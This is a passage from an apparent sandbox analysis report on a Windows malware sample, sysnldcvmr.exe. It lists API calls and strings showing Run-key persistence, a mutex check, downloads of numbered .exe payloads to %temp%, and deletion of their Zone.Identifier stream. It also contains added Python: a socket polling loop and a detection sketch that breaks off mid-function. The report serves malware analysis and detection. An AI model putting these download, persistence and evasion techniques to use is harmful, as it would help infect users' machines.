GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5329->5334 5335 40138b 5329->5335 5331 401395 5332 40a1b0 __aligned_recalloc_base 3 API calls 5331->5332 5332->5333 5333->5250 5334->5329 5404 40ab40 shutdown closesocket 5335->5404 5337 401115 ioctlsocket 5336->5337 5338 4011e4 5337->5338 5343 40113a 5337->5343 5339 40a1b0 __aligned_recalloc_base 3 API calls 5338->5339 5341 4011ea 5339->5341 5340 4011cd WaitForSingleObject 5340->5337 5340->5338 5342 409fe0 9 API calls 5342->5343 5343->5340 5343->5342 5344 401168 recvfrom 5343->5344 5345 4011ad InterlockedExchangeAdd 5343->5345 5344->5340 5344->5343 5347 401000 5345->5347 5348 401014 5347->5348 5349 
40103b 5348->5349 5350 409d90 7 API calls 5348->5350 5358 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5349->5358 5350->5349 5352 40105b 5359 401580 5352->5359 5354 4010ec 5354->5343 5355 4010a3 IsBadReadPtr 5357 401071 5355->5357 5356 4010d8 memmove 5356->5357 5357->5354 5357->5355 5357->5356 5358->5352 5360 401592 5359->5360 5361 4015a5 memcpy 5359->5361 5362 409fe0 9 API calls 5360->5362 5364 4015c1 5361->5364 5363 40159f 5362->5363 5363->5361 5364->5357 5366 40bf00 3 API calls 5365->5366 5367 40b48b 5366->5367 5368 40b4a7 lstrlenA 5367->5368 5369 40c190 7 API calls 5368->5369 5370 40b4dd 5369->5370 5371 40b508 5370->5371 5376 40d520 5370->5376 5379 40cc30 5370->5379 5371->5243 5372 40b4fc 5373 40a1b0 __aligned_recalloc_base 3 API calls 5372->5373 5373->5371 5384 401200 5376->5384 5378 40d542 5378->5372 5400 40cc90 5379->5400 5382 40cc5e 5382->5372 5383 40cc90 send 5383->5382 5385 401314 5384->5385 5386 40121d 5384->5386 5385->5378 5386->5385 5387 409fa0 __aligned_recalloc_base 7 API calls 5386->5387 5388 401247 memcpy htons 5387->5388 5389 4012ed 5388->5389 5390 401297 sendto 5388->5390 5393 40a1b0 __aligned_recalloc_base 3 API calls 5389->5393 5391 4012b6 InterlockedExchangeAdd 5390->5391 5392 4012e9 5390->5392 5391->5390 5394 4012cc 5391->5394 5392->5389 5395 40130a 5392->5395 5396 4012fc 5393->5396 5398 40a1b0 __aligned_recalloc_base 3 API calls 5394->5398 5397 40a1b0 __aligned_recalloc_base 3 API calls 5395->5397 5396->5378 5397->5385 5399 4012db 5398->5399 5399->5378 5401 40cca1 send 5400->5401 5402 40cc43 5401->5402 5403 40ccbe 5401->5403 5402->5382 5402->5383 5403->5401 5403->5402 5404->5331 5406 401ef2 InterlockedDecrement setsockopt closesocket 5405->5406 5407 401d74 5405->5407 5424 401e39 5406->5424 5407->5406 5408 401d7c 5407->5408 5425 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5408->5425 5410 401d81 InterlockedExchange 5411 401d98 5410->5411 5412 401e4e 5410->5412 5417 401da9 InterlockedDecrement 5411->5417 5418 401dbc 

                                                                    Control-flow Graph (rendered graph of function 00402020 omitted; its API calls are listed below)
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                    • htons.WS2_32(?), ref: 00402101
                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1603358586-0
                                                                    • Opcode ID: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                    • Opcode Fuzzy Hash: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A

                                                                    Control-flow Graph (rendered graph of function 0040D710 omitted; its API calls are listed below)
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                    • String ID: 239.255.255.250
                                                                    • API String ID: 726339449-2186272203
                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                    • htons.WS2_32(?), ref: 00401508
                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                    • String ID:
                                                                    • API String ID: 4174406920-0
                                                                    • Opcode ID: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                    • Opcode Fuzzy Hash: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                    • String ID:
                                                                    • API String ID: 107502007-0
                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
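The API chain listed above (GetTickCount, ioctlsocket, recv, Sleep(1), GetTickCount) is a poll-for-data loop with a deadline: the ioctlsocket request code 0x4004667F is Winsock's FIONREAD ("bytes available"), so the function repeatedly asks whether data is queued, reads it when it is, and otherwise sleeps 1 ms until the tick-count deadline passes. The following Python is an added example of that pattern, not code from the sample or from Joe Sandbox; it uses select() with a zero timeout as a portable stand-in for the FIONREAD probe and time.monotonic() in place of GetTickCount, and the socketpair traffic is constructed for the demonstration.

```python
"""Polling receive-with-deadline loop modelled on GetTickCount/ioctlsocket(FIONREAD)/recv/Sleep(1).

Added example, not code from the sample or from Joe Sandbox.
Stand-ins (assumptions): select() with timeout 0 for ioctlsocket(FIONREAD),
time.monotonic() for GetTickCount(), a socketpair for the sample's C2 socket.
"""
import select
import socket
import time
from typing import Optional, Tuple


def recv_with_deadline(sock: socket.socket, max_bytes: int, timeout_ms: int) -> Optional[bytes]:
    """Return queued data as soon as any is available, or None once timeout_ms has elapsed.

    The 1 ms sleep between probes mirrors the Sleep(1) in the sample: it stops the
    loop from spinning flat out, at the cost of ~1 ms timeout granularity.
    """
    deadline = time.monotonic() + timeout_ms / 1000.0   # GetTickCount() + timeout
    sock.setblocking(False)
    while True:
        readable, _, _ = select.select([sock], [], [], 0)   # FIONREAD stand-in: anything queued?
        if readable:
            try:
                return sock.recv(max_bytes)                  # recv(s, buf, len, 0)
            except BlockingIOError:
                pass                                         # readiness raced away; keep polling
        if time.monotonic() >= deadline:                     # second GetTickCount() check
            return None
        time.sleep(0.001)                                    # Sleep(1)


def demo() -> Tuple[Optional[bytes], Optional[bytes], float]:
    """Exercise both paths on a constructed socketpair: data present, then timeout with no data."""
    a, b = socket.socketpair()
    try:
        a.sendall(b"PING")                                   # constructed peer traffic
        got = recv_with_deadline(b, 10000, timeout_ms=500)   # 0x2710 = 10000-byte read
        t0 = time.monotonic()
        nothing = recv_with_deadline(b, 10000, timeout_ms=50)
        waited = time.monotonic() - t0
    finally:
        a.close()
        b.close()
    return got, nothing, waited
```

A loop like this is how a beacon waits for tasking without blocking forever; for detection, the observable side effect is the burst of 1 ms sleeps between socket reads rather than a single blocking recv.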
                                                                    APIs
                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    Strings
                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                    • String ID: www.update.microsoft.com
                                                                    • API String ID: 4063137541-1705189816
                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                    • String ID: Bz@
                                                                    • API String ID: 1815803762-793989200
                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3943618503-0
                                                                    • Opcode ID: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                    • Opcode Fuzzy Hash: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040759E
                                                                    • CreateMutexA.KERNEL32(00000000,00000000,753f85d83d), ref: 004075AD
                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000105), ref: 00407602
                                                                    • PathFindFileNameW.SHLWAPI(C:\Windows\sysnldcvmr.exe), ref: 0040760D
                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040763A
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                    • wcscmp.NTDLL ref: 00407663
                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysnldcvmr.exe$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                    • API String ID: 4172876685-36690512
                                                                    • Opcode ID: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                    • Opcode Fuzzy Hash: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                    • rand.MSVCRT ref: 0040EB39
                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                    • rand.MSVCRT ref: 0040ED41
                                                                    • rand.MSVCRT ref: 0040ED55
                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.Mw
                                                                    • API String ID: 3709769524-1426338499
                                                                    • Opcode ID: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                    • Opcode Fuzzy Hash: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
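The routine above downloads a payload (InternetOpenUrlW/InternetReadFile/WriteFile, with URLDownloadToFileW as a second attempt) into a file named from the %temp% path and two rand() values via the "%s\%d%d.exe" format, then calls DeleteFileW on "%s:Zone.Identifier" for that file, which removes the mark-of-the-web stream so the dropped binary is not treated as an Internet download. The Python below is an added detection sketch for that two-step pattern, not code from the sample or from Joe Sandbox: it correlates, per process, the creation of a %temp%\<digits>.exe with a later deletion of that file's Zone.Identifier stream. The event records are constructed in a simplified schema for the example (pid, op, target); the field names are an assumption and must be mapped to real file-create and stream-delete telemetry before use.

```python
"""Correlate "%temp%\\<digits>.exe written" with "its :Zone.Identifier stream deleted" per process.

Added example, not code from the sample or from Joe Sandbox. The event schema
(pid, op, target) and SAMPLE_EVENTS are constructed for this demonstration.
"""
import re
from typing import Iterable, List, Tuple

# wsprintfW("%s\\%d%d.exe", %temp%, rand(), rand()) produces an all-digit basename under Temp.
TEMP_DROP = re.compile(r"\\temp\\\d+\.exe$", re.IGNORECASE)
# wsprintfW("%s:Zone.Identifier", path) names the mark-of-the-web alternate data stream.
ZONE_ID = re.compile(r"(.+):Zone\.Identifier$", re.IGNORECASE)


def find_motw_strip(events: Iterable[dict]) -> List[Tuple[int, str]]:
    """Return (pid, path) for every %temp%\\<digits>.exe whose Zone.Identifier stream
    was deleted by the same process that created the file, in that order."""
    created = set()                       # (pid, lowercase path) of tracked drops
    hits: List[Tuple[int, str]] = []
    for ev in events:
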